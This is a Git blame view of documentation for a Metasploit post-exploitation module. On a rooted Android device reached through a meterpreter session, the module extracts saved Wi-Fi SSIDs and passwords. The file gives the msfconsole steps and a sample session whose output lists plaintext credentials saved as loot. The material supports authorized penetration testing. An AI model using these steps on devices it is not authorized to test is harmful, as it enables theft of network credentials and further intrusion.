Files
metasploit-gs/documentation/modules/post/android/gather/wireless_ap.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

46 lines
1.2 KiB
Markdown
Raw Normal View History

2018-05-02 18:04:34 +05:30
## Vulnerable Application
2018-05-17 21:03:12 +08:00
This post-exploitation module will extract all saved Wireless access point credentials from the target android device.
2018-05-02 18:04:34 +05:30
## Verification Steps
1. Start `msfconsole`
2. Get a **root** meterpreter session (use exploit/android/local/...)
3. `use post/android/gather/wireless_ap`
4. `set SESSION <session id>`
5. `run`
6. You should be able to see the extracted credentials.
2018-05-02 18:04:34 +05:30
## Options
**SESSION** - The session to run the module on.
2018-05-02 18:04:34 +05:30
## Extracted data
Wireless AP credentials (SSID, network type and password)
2018-05-02 18:04:34 +05:30
## Scenarios
2018-05-02 18:04:34 +05:30
2018-05-17 21:03:12 +08:00
```
2018-05-17 13:04:50 +05:30
msf5 exploit(multi/handler) > use post/android/gather/wireless_ap
2018-05-02 18:04:34 +05:30
msf5 post(android/gather/wireless_ap) > set session 1
session => 1
msf5 post(android/gather/wireless_ap) > run
Wireless APs
============
SSID net_type password
---- -------- --------
2018-05-17 13:04:50 +05:30
ADYYYXRoYXJ2YWpvc2hp WPA-PSK   lkjhgfdsa
FCP_WiFi              NONE
HomeCable             WPA-PSK   p@$$w0rd
Troika               WPA-PSK   ika@12345
2018-05-02 18:04:34 +05:30
2018-05-17 21:03:12 +08:00
[+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt
2018-05-02 18:04:34 +05:30
[*] Post module execution completed
msf5 post(android/gather/wireless_ap) >
2018-05-17 21:03:12 +08:00
```